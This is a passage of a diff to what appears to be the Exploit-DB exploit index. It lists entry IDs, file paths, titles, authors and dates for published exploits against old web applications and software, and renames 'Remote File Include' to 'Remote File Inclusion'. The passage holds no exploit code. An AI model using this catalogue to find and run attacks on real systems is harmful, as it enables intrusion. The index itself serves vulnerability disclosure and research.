1.21/1.25 Common.php Remote File Include",2006-06-05,SpC-x,php,webapps,0 +27970,platforms/php/webapps/27970.txt,"CyBoards PHP Lite 1.21/1.25 Common.php Remote File Inclusion",2006-06-05,SpC-x,php,webapps,0 27971,platforms/windows/dos/27971.txt,"Microsoft Internet Explorer 5.0.1 Frameset Memory Corruption",2006-06-05,Kil13r,windows,dos,0 27655,platforms/ios/webapps/27655.txt,"Copy to WebDAV 1.1 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27656,platforms/ios/webapps/27656.txt,"Photo Transfer Upload 1.0 iOS - Multiple Vulnerabilities",2013-08-17,Vulnerability-Lab,ios,webapps,0 27658,platforms/php/webapps/27658.txt,"PHPGuestbook 0.0.2/1.0 HTML Injection",2006-04-15,Qex,php,webapps,0 27659,platforms/php/webapps/27659.txt,"phpFaber TopSites Index.php Cross-Site Scripting",2006-04-17,botan,php,webapps,0 -27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.php Remote File Include",2006-04-17,r0t,php,webapps,0 +27660,platforms/php/webapps/27660.txt,"Monster Top List 1.4 Functions.php Remote File Inclusion",2006-04-17,r0t,php,webapps,0 27661,platforms/php/webapps/27661.txt,"TinyPHPForum 3.6 - Multiple Cross-Site Scripting Vulnerabilities (1)",2006-04-17,Hessam-x,php,webapps,0 -27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 Index.php Local File Include",2006-04-17,"Hamid Ebadi",php,webapps,0 +27662,platforms/php/webapps/27662.txt,"Blursoft Blur6ex 0.3.462 Index.php Local File Inclusion",2006-04-17,"Hamid Ebadi",php,webapps,0 27663,platforms/php/webapps/27663.txt,"DbbS 2.0 - Multiple Input Validation Vulnerabilities",2006-04-17,rgod,php,webapps,0 27664,platforms/php/webapps/27664.txt,"Jax Guestbook 3.50 Page Parameter Cross-Site Scripting",2006-04-17,ALMOKANN3,php,webapps,0 27665,platforms/php/webapps/27665.txt,"Calendarix 0.7 YearCal.php Cross-Site Scripting",2006-04-17,botan,php,webapps,0 27666,platforms/php/webapps/27666.txt,"Manila 9.0.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-17,"Aaron Kaplan",php,webapps,0 27667,platforms/php/webapps/27667.txt,"MyBB 1.1 Global Variable Overwrite",2006-04-17,imei,php,webapps,0 27668,platforms/multiple/dos/27668.c,"Neon Responders 5.4 - Remote Clock Synchronization Denial of Service",2006-04-10,"Stefan Lochbihler",multiple,dos,0 -27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 Index.php Local File Include",2006-04-17,imei,php,webapps,0 +27669,platforms/php/webapps/27669.txt,"Coppermine 1.4.4 Index.php Local File Inclusion",2006-04-17,imei,php,webapps,0 27670,platforms/linux/dos/27670.txt,"Xine 0.9/1.0 Playlist Handling Remote Format String",2006-04-18,c0ntexb,linux,dos,0 27671,platforms/php/webapps/27671.txt,"LinPHA 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-04-18,d4igoro,php,webapps,0 27672,platforms/cgi/webapps/27672.txt,"axoverzicht.CGI Cross-Site Scripting",2006-04-18,Qex,cgi,webapps,0 @@ -24801,7 +24801,7 @@ id,file,description,date,author,platform,type,port 28053,platforms/hardware/webapps/28053.txt,"Zoom Telephonics ADSL Modem/Router - Multiple Vulnerabilities",2013-09-03,"Kyle Lovett",hardware,webapps,0 28054,platforms/php/webapps/28054.txt,"WordPress IndiaNIC Testimonial Plugin - Multiple Vulnerabilities",2013-09-03,RogueCoder,php,webapps,0 27700,platforms/windows/dos/27700.py,"VLC Player 2.0.8 - (.m3u) Local Crash PoC",2013-08-19,Asesino04,windows,dos,0 -27707,platforms/php/webapps/27707.txt,"I-RATER Platinum Common.php Remote File Include",2006-04-20,r0t,php,webapps,0 +27707,platforms/php/webapps/27707.txt,"I-RATER Platinum Common.php Remote File Inclusion",2006-04-20,r0t,php,webapps,0 27708,platforms/php/webapps/27708.txt,"EasyGallery 1.17 EasyGallery.php Cross-Site Scripting",2006-04-20,botan,php,webapps,0 27709,platforms/php/webapps/27709.txt,"4homepages 4images 1.7 Member.php Cross-Site Scripting",2006-04-20,Qex,php,webapps,0 27710,platforms/php/webapps/27710.txt,"W2B Online Banking SID Parameter Cross-Site Scripting",2006-04-20,r0t,php,webapps,0 @@ -24862,12 +24862,12 @@ id,file,description,date,author,platform,type,port 27760,platforms/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal",2006-04-28,Sowhat,windows,remote,0 27761,platforms/cgi/webapps/27761.txt,"NeoMail NeoMail.PL SessionID Parameter Cross-Site Scripting",2006-04-28,O.U.T.L.A.W,cgi,webapps,0 27762,platforms/linux/dos/27762.txt,"LibTiff 3.x - Multiple Denial of Service Vulnerabilities",2006-04-28,"Tavis Ormandy",linux,dos,0 -27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.php Remote File Include",2006-04-28,O.U.T.L.A.W,php,webapps,0 +27763,platforms/php/webapps/27763.php,"I-RATER Platinum Config_settings.TPL.php Remote File Inclusion",2006-04-28,O.U.T.L.A.W,php,webapps,0 27764,platforms/linux/dos/27764.txt,"LibTiff 3.x TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",linux,dos,0 27765,platforms/linux/dos/27765.txt,"LibTiff 3.x Double Free Memory Corruption",2008-04-28,"Tavis Ormandy",linux,dos,0 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 -27767,platforms/php/webapps/27767.txt,"Artmedic Event Index.php Remote File Include",2006-04-28,botan,php,webapps,0 -27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 Index.php Remote File Include",2006-04-28,botan,php,webapps,0 +27767,platforms/php/webapps/27767.txt,"Artmedic Event Index.php Remote File Inclusion",2006-04-28,botan,php,webapps,0 +27768,platforms/php/webapps/27768.php,"CoolMenus 4.0 Index.php Remote File Inclusion",2006-04-28,botan,php,webapps,0 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27770,platforms/php/webapps/27770.txt,"Blog 0.2.3/0.2.4 Mod Weblog_posting.php SQL Injection",2006-04-29,Qex,php,webapps,0 27771,platforms/php/webapps/27771.txt,"Ovidentia 7.9.4 - Multiple Vulnerabilities",2013-08-22,LiquidWorm,php,webapps,80 @@ -24880,14 +24880,14 @@ id,file,description,date,author,platform,type,port 27776,platforms/linux/webapps/27776.rb,"Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment",2013-08-22,Metasploit,linux,webapps,443 27777,platforms/windows/webapps/27777.txt,"DeWeS 0.4.2 - Directory Traversal",2013-08-22,"High-Tech Bridge SA",windows,webapps,0 27778,platforms/linux/dos/27778.txt,"Samba nttrans Reply - Integer Overflow",2013-08-22,x90c,linux,dos,139 -27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x Addentry.php Remote File Include",2006-04-29,[Oo],php,webapps,0 +27779,platforms/php/webapps/27779.txt,"Advanced GuestBook 2.x Addentry.php Remote File Inclusion",2006-04-29,[Oo],php,webapps,0 27780,platforms/php/webapps/27780.txt,"4Images 1.7.1 - top.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27781,platforms/php/webapps/27781.txt,"4Images 1.7.1 - member.php sessionid Parameter SQL Injection",2006-04-29,CrAzY.CrAcKeR,php,webapps,0 27782,platforms/php/webapps/27782.txt,"TextFileBB 1.0.16 - Multiple Tag Script Injection Vulnerabilities",2006-04-29,r0xes,php,webapps,0 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 27784,platforms/php/webapps/27784.txt,"PlanetGallery Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0 -27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.php - Remote File Include",2006-05-01,beford,php,webapps,0 -27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 Mod KB_constants.php Remote File Include",2006-05-01,[Oo],php,webapps,0 +27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b Kopf.php - Remote File Inclusion",2006-05-01,beford,php,webapps,0 +27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 Mod KB_constants.php Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injection Vulnerabilities",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 signup.php referral Parameter XSS",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 members.php id Parameter XSS",2006-05-01,r0t,php,webapps,0 @@ -24907,7 +24907,7 @@ id,file,description,date,author,platform,type,port 27803,platforms/php/webapps/27803.txt,"321soft PhP-Gallery 0.9 - index.php path Variable Arbitrary Directory Listing",2006-05-03,d4igoro,php,webapps,0 27804,platforms/php/webapps/27804.txt,"321soft PhP-Gallery 0.9 index.php path Parameter XSS",2006-05-03,d4igoro,php,webapps,0 27805,platforms/windows/remote/27805.py,"dreamMail e-mail client 4.6.9.2 - Stored XSS",2013-08-23,loneferret,windows,remote,0 -27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.php Remote File Include",2006-05-03,R@1D3N,php,webapps,0 +27807,platforms/php/webapps/27807.txt,"Fast Click SQL Lite 1.1.2/1.1.3 Show.php Remote File Inclusion",2006-05-03,R@1D3N,php,webapps,0 27808,platforms/php/webapps/27808.txt,"Pacheckbook 1.1 Index.php Multiple SQL Injection Vulnerabilities",2006-05-03,almaster,php,webapps,0 27809,platforms/php/webapps/27809.txt,"MyNews 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,DreamLord,php,webapps,0 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 dlisting.php cid Parameter XSS",2006-05-02,r0t,php,webapps,0 @@ -24945,7 +24945,7 @@ id,file,description,date,author,platform,type,port 27842,platforms/asp/webapps/27842.txt,"MultiCalendars 3.0 - All_calendars.ASP SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 27843,platforms/php/webapps/27843.txt,"MyBB 1.1.1 Showthread.php SQL Injection",2006-05-09,Breeeeh,php,webapps,0 27844,platforms/asp/webapps/27844.txt,"EPublisherPro 0.9.7 Moreinfo.ASP Cross-Site Scripting",2006-05-09,Dj_Eyes,asp,webapps,0 -27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.php Remote File Include",2006-05-09,ReZEN,php,webapps,0 +27845,platforms/php/webapps/27845.php,"ISPConfig 2.2.2/2.2.3 Session.INC.php Remote File Inclusion",2006-05-09,ReZEN,php,webapps,0 27846,platforms/asp/webapps/27846.txt,"EImagePro - - subList.asp CatID Parameter SQL Injection",2006-05-09,Dj_Eyes,asp,webapps,0 33405,platforms/multiple/remote/33405.txt,"APC Network Management Card Cross-Site Request Forgery and Cross-Site Scripting Vulnerabilities",2009-12-15,"Jamal Pecou",multiple,remote,0 27848,platforms/php/webapps/27848.txt,"EImagePro - view.asp Pic Parameter SQL Injection",2006-05-09,Dj_Eyes,php,webapps,0 @@ -24965,19 +24965,19 @@ id,file,description,date,author,platform,type,port 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 diapo.php rep Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 affich.php image Parameter XSS",2006-05-13,"Morocco Security Team",php,webapps,0 27867,platforms/php/webapps/27867.txt,"Gphotos 1.4/1.5 index.php rep Variable Traversal Arbitrary Directory Listing",2006-05-13,"Morocco Security Team",php,webapps,0 -27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - CFG[popphoto_base_path] Parameter Remote File Include",2006-05-15,VietMafia,php,webapps,0 +27868,platforms/php/webapps/27868.txt,"Pixaria PopPhoto 3.5.4 - CFG[popphoto_base_path] Parameter Remote File Inclusion",2006-05-15,VietMafia,php,webapps,0 27869,platforms/php/webapps/27869.txt,"PHP Script Tools PSY Auction - item.php id Parameter SQL Injection",2006-05-15,Luny,php,webapps,0 27870,platforms/php/webapps/27870.txt,"PHP Script Tools PSY Auction - email_request.php user_id Parameter XSS",2006-05-15,Luny,php,webapps,0 27871,platforms/php/webapps/27871.txt,"mooSocial 1.3 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0 27872,platforms/php/webapps/27872.txt,"PhpVibe 3.1 - Multiple Vulnerabilites",2013-08-26,Esac,php,webapps,0 27873,platforms/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - RCE PoC",2013-08-26,Aodrulez,hardware,remote,0 27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0 -27875,platforms/linux/dos/27875.c,"libtiff <= 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos,0 +27875,platforms/linux/dos/27875.c,"libtiff 3.9.5 - Integer Overflow",2013-08-26,x90c,linux,dos,0 27876,platforms/php/webapps/27876.txt,"Musicbox 2.3.8 - Multiple Vulnerabilities",2013-08-26,DevilScreaM,php,webapps,0 27877,platforms/windows/remote/27877.rb,"Oracle Endeca Server Remote Command Execution",2013-08-26,Metasploit,windows,remote,7770 27878,platforms/hardware/webapps/27878.txt,"Loftek Nexus 543 IP Cameras - Multiple Vulnerabilities",2013-08-26,"Craig Young",hardware,webapps,0 27879,platforms/php/webapps/27879.txt,"Joomla! VirtueMart Component 2.0.22a - SQL Injection",2013-08-26,"Matias Fontanini",php,webapps,0 -27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 Popup.php Local File Include",2006-05-15,Mr.CrackerZ,php,webapps,0 +27880,platforms/php/webapps/27880.pl,"RadScripts RadLance 7.0 Popup.php Local File Inclusion",2006-05-15,Mr.CrackerZ,php,webapps,0 27881,platforms/php/webapps/27881.txt,"PHPODP 1.5 ODP.php Cross-Site Scripting",2006-05-15,Kiki,php,webapps,0 27882,platforms/java/dos/27882.java,"Sun Java Applet Font.createFont Remote Denial of Service",2006-05-15,"Marc Schoenefeld",java,dos,0 27883,platforms/php/webapps/27883.txt,"MonoChat 1.0 HTML Injection",2005-05-15,X-BOY,php,webapps,0 @@ -25001,8 +25001,8 @@ id,file,description,date,author,platform,type,port 27901,platforms/multiple/dos/27901.java,"Sun Java Runtime Environment 1.3/1.4/1.5 Nested Array Objects Denial of Service",2006-05-22,"Marc Schoenefeld",multiple,dos,0 27902,platforms/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",linux,remote,0 27903,platforms/linux/dos/27903.txt,"Dia 0.8x/0.9x Filename Remote Format String",2006-05-23,KaDaL-X,linux,dos,0 -27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x_DoceboKms 3.0.3_Docebo CMS 3.0.x - Multiple Remote File Include Vulnerabilities",2006-05-23,Kacper,php,webapps,0 -27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x Lang Parameter Multiple Remote File Include Vulnerabilities",2006-05-26,beford,php,webapps,0 +27904,platforms/php/webapps/27904.txt,"DoceboLms 2.0.x/3.0.x_DoceboKms 3.0.3_Docebo CMS 3.0.x - Multiple Remote File Inclusion Vulnerabilities",2006-05-23,Kacper,php,webapps,0 +27905,platforms/php/webapps/27905.txt,"DoceboLms 2.0.x Lang Parameter Multiple Remote File Inclusion Vulnerabilities",2006-05-26,beford,php,webapps,0 27906,platforms/windows/dos/27906.txt,"Microsoft Internet Explorer 6.0 - Malformed HTML Parsing Denial of Service (2)",2006-05-26,"Thomas Waldegger",windows,dos,0 27907,platforms/php/webapps/27907.txt,"SaPHPLesson 2.0 Show.php SQL Injection",2006-05-27,SwEET-DeViL,php,webapps,0 27908,platforms/php/webapps/27908.txt,"Chipmunk 1.4 Guestbook Index.php Cross-Site Scripting",2006-05-27,black-code,php,webapps,0 @@ -25023,9 +25023,9 @@ id,file,description,date,author,platform,type,port 27923,platforms/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway Login_error.SHTML Cross-Site Scripting",2006-05-30,"Jaime Blasco",hardware,remote,0 27924,platforms/php/webapps/27924.txt,"ToendaCMS 0.7 Index.php Cross-Site Scripting",2006-05-31,Jokubas,php,webapps,0 27925,platforms/linux/dos/27925.txt,"Linux Kernel 2.6.x - Proc dentry_unused Corruption Local Denial of Service",2006-05-31,"Tony Griffiths",linux,dos,0 -27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - Index.php Local File Include",2006-05-31,darkgod,php,webapps,0 -27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Include Vulnerabilities",2005-05-31,ERNE,php,webapps,0 -27928,platforms/php/webapps/27928.txt,"OSTicket 1.x Open_form.php Remote File Include",2006-05-31,Sweet,php,webapps,0 +27926,platforms/php/webapps/27926.txt,"PHPMyDesktop/Arcade 1.0 - Index.php Local File Inclusion",2006-05-31,darkgod,php,webapps,0 +27927,platforms/php/webapps/27927.txt,"PHP-Nuke 7.x - Multiple Remote File Inclusion Vulnerabilities",2005-05-31,ERNE,php,webapps,0 +27928,platforms/php/webapps/27928.txt,"OSTicket 1.x Open_form.php Remote File Inclusion",2006-05-31,Sweet,php,webapps,0 27929,platforms/php/webapps/27929.txt,"vBulletin 3.0.10 Portal.php SQL Injection",2006-05-31,SpC-x,php,webapps,0 27930,platforms/windows/dos/27930.txt,"Microsoft Windows XP/2000/2003 MHTML URI Buffer Overflow",2006-05-31,Mr.Niega,windows,dos,0 27931,platforms/multiple/remote/27931.txt,"Snort 2.4.x URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",multiple,remote,0 @@ -25036,7 +25036,7 @@ id,file,description,date,author,platform,type,port 27995,platforms/php/webapps/27995.txt,"Open Business Management 1.0.3 pl1 group_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 27996,platforms/php/webapps/27996.txt,"Open Business Management 1.0.3 pl1 user_index.php tf_lastname Parameter XSS",2006-06-07,r0t,php,webapps,0 27997,platforms/php/webapps/27997.txt,"Open Business Management 1.0.3 pl1 list_index.php Multiple Parameter XSS",2006-06-07,r0t,php,webapps,0 -28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Include",2006-08-16,O.U.T.L.A.W,php,webapps,0 +28394,platforms/php/webapps/28394.pl,"FusionPHP Fusion News 3.7 Index.php Remote File Inclusion",2006-08-16,O.U.T.L.A.W,php,webapps,0 27938,platforms/linux/local/27938.rb,"VMWare - Setuid vmware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0 27939,platforms/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution",2013-08-29,Metasploit,windows,remote,0 27940,platforms/windows/remote/27940.rb,"Firefox XMLSerializer Use After Free",2013-08-29,Metasploit,windows,remote,0 @@ -25047,7 +25047,7 @@ id,file,description,date,author,platform,type,port 27945,platforms/asp/webapps/27945.txt,"Enigma Haber 4.2 - Cross-Site Scripting",2006-06-02,The_BeKiR,asp,webapps,0 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 -27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x Redirect.php Local File Include",2006-06-02,brokejunker,php,webapps,0 +27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x Redirect.php Local File Inclusion",2006-06-02,brokejunker,php,webapps,0 27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 @@ -25056,15 +25056,15 @@ id,file,description,date,author,platform,type,port 27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0 -27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Include Vulnerabilities",2006-06-02,ERNE,php,webapps,0 +27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Inclusion Vulnerabilities",2006-06-02,ERNE,php,webapps,0 27958,platforms/php/webapps/27958.txt,"DeltaScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 Viewmsg.ASP SQL Injection",2006-06-02,ajann,asp,webapps,0 -27961,platforms/php/webapps/27961.txt,"PHPBB 2.0.x Template.php Remote File Include",2006-06-02,Canberx,php,webapps,0 +27961,platforms/php/webapps/27961.txt,"PHPBB 2.0.x Template.php Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 27962,platforms/php/webapps/27962.txt,"IBWd Guestbook 1.0 Index.php SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 Index.php SQL Injection",2006-06-03,SpC-x,php,webapps,0 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x Editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0 -27965,platforms/osx/local/27965.py,"OSX <= 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 +27965,platforms/osx/local/27965.py,"OSX 10.8.4 - Local Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 27992,platforms/unix/remote/27992.txt,"FreeType TTF File Remote Buffer Overflow",2006-06-08,"Josh Bressers",unix,remote,0 27993,platforms/multiple/dos/27993.txt,"FreeType TTF File Remote Denial of Service",2006-06-08,"Josh Bressers",multiple,dos,0 27979,platforms/php/webapps/27979.html,"myNewsletter 1.1.2 UserName SQL Injection",2006-06-05,FarhadKey,php,webapps,0 @@ -25088,26 +25088,26 @@ id,file,description,date,author,platform,type,port 28005,platforms/windows/remote/28005.pl,"Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection",2006-06-13,"Daniel Fabian",windows,remote,0 28006,platforms/php/webapps/28006.txt,"NPDS 5.10 - Multiple Input Validation Vulnerabilities",2006-06-12,DarkFig,php,webapps,0 28007,platforms/windows/remote/28007.txt,"WinSCP 3.8.1 URI Handler Remote Arbitrary File Access",2006-06-12,"Jelmer Kuperus",windows,remote,0 -28008,platforms/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Include",2006-06-12,"Federico Fazzi",php,webapps,0 +28008,platforms/php/webapps/28008.txt,"Adaptive Website Framework 1.11 - Remote File Inclusion",2006-06-12,"Federico Fazzi",php,webapps,0 28009,platforms/php/webapps/28009.txt,"Five Star Review Script - index2.php sort Parameter XSS",2006-06-12,Luny,php,webapps,0 28010,platforms/php/webapps/28010.txt,"Five Star Review Script - report.php item_id Parameter XSS",2006-06-12,Luny,php,webapps,0 28011,platforms/php/webapps/28011.txt,"iFoto 0.20 Index.php Cross-Site Scripting",2006-06-12,Luny,php,webapps,0 -28012,platforms/php/webapps/28012.txt,"Foing 0.x - Remote File Include",2006-06-12,Darkfire,php,webapps,0 +28012,platforms/php/webapps/28012.txt,"Foing 0.x - Remote File Inclusion",2006-06-12,Darkfire,php,webapps,0 28013,platforms/php/webapps/28013.txt,"SixCMS 6.0 List.php Cross-Site Scripting",2006-06-12,Aesthetico,php,webapps,0 28014,platforms/php/webapps/28014.txt,"SixCMS 6.0 Detail.php Directory Traversal",2006-06-12,Aesthetico,php,webapps,0 28015,platforms/php/webapps/28015.txt,"iFusion iFlance 1.1 - Multiple Input Validation Vulnerabilities",2006-06-12,Luny,php,webapps,0 -28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Include Vulnerabilities",2006-06-13,R@1D3N,php,webapps,0 +28016,platforms/php/webapps/28016.txt,"DoubleSpeak 0.1 - Multiple Remote File Inclusion Vulnerabilities",2006-06-13,R@1D3N,php,webapps,0 28017,platforms/php/webapps/28017.txt,"CEScripts Multiple Scripts Cross-Site Scripting Vulnerabilities",2006-06-13,Luny,php,webapps,0 28018,platforms/php/webapps/28018.txt,"VBZoom 1.0/1.1 - Multiple SQL Injection Vulnerabilities",2006-06-13,"CrAzY CrAcKeR",php,webapps,0 -28019,platforms/php/webapps/28019.txt,"Simpnews 2.x Wap_short_news.php Remote File Include",2006-06-13,SpC-x,php,webapps,0 +28019,platforms/php/webapps/28019.txt,"Simpnews 2.x Wap_short_news.php Remote File Inclusion",2006-06-13,SpC-x,php,webapps,0 28020,platforms/php/webapps/28020.txt,"Andy Mack 35mm Slide Gallery 6.0 index.php imgdir Parameter XSS",2006-06-13,black-cod3,php,webapps,0 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 popup.php Multiple Parameter XSS",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injection Vulnerabilities",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 FTP_index.php Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0 -28024,platforms/php/webapps/28024.txt,"PhpBB BBRSS.php Remote File Include",2006-06-14,SpC-x,php,webapps,0 -28025,platforms/php/webapps/28025.txt,"RahnemaCo Page.php Remote File Include",2006-06-14,Breeeeh,php,webapps,0 +28024,platforms/php/webapps/28024.txt,"PhpBB BBRSS.php Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0 +28025,platforms/php/webapps/28025.txt,"RahnemaCo Page.php Remote File Inclusion",2006-06-14,Breeeeh,php,webapps,0 28026,platforms/linux/dos/28026.txt,"MySQL Server 4/5 Str_To_Date Remote Denial of Service",2006-06-14,Kanatoko,linux,dos,0 -28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Include Vulnerabilities",2006-06-14,"Federico Fazzi",php,webapps,0 +28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusion Vulnerabilities",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 28060,platforms/php/webapps/28060.txt,"Datecomm 1.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-19,Luny,php,webapps,0 28059,platforms/php/webapps/28059.txt,"SAPHPLesson 1.1/2.0/3.0 - Multiple SQL Injection Vulnerabilities",2006-06-19,"CrAzY CrAcKeR",php,webapps,0 @@ -25115,11 +25115,11 @@ id,file,description,date,author,platform,type,port 28031,platforms/php/webapps/28031.txt,"HotPlug CMS 1.0 Login1.php Cross-Site Scripting",2006-06-15,"Federico Fazzi",php,webapps,0 28032,platforms/php/webapps/28032.txt,"MPCS 0.2 Comment.php Cross-Site Scripting",2006-03-06,Luny,php,webapps,0 28033,platforms/php/webapps/28033.txt,"VBZoom 1.11 Forum.php SQL Injection",2006-06-15,CrAsh_oVeR_rIdE,php,webapps,0 -28034,platforms/php/webapps/28034.txt,"Ji-takz Remote File Include",2006-06-16,SpC-x,php,webapps,0 +28034,platforms/php/webapps/28034.txt,"Ji-takz Remote File Inclusion",2006-06-16,SpC-x,php,webapps,0 28035,platforms/php/webapps/28035.txt,"mcGuestbook 1.3 admin.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 28036,platforms/php/webapps/28036.txt,"mcGuestbook 1.3 ecrire.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 28037,platforms/php/webapps/28037.txt,"mcGuestbook 1.3 lire.php lang Parameter Remote File Inclusion",2006-06-16,SwEET-DeViL,php,webapps,0 -28038,platforms/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Include Vulnerabilities",2006-06-16,CrAsh_oVeR_rIdE,php,webapps,0 +28038,platforms/php/webapps/28038.txt,"Indexu 5.0.1 - Multiple Remote File Inclusion Vulnerabilities",2006-06-16,CrAsh_oVeR_rIdE,php,webapps,0 28039,platforms/php/webapps/28039.txt,"dotWidget for articles 2.0 showcatpicks.php file_path Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28040,platforms/php/webapps/28040.txt,"dotWidget for articles 2.0 showarticle.php file_path Parameter Remote File Inclusion",2006-06-03,SwEET-DeViL,php,webapps,0 28041,platforms/php/webapps/28041.txt,"dotWidget for articles 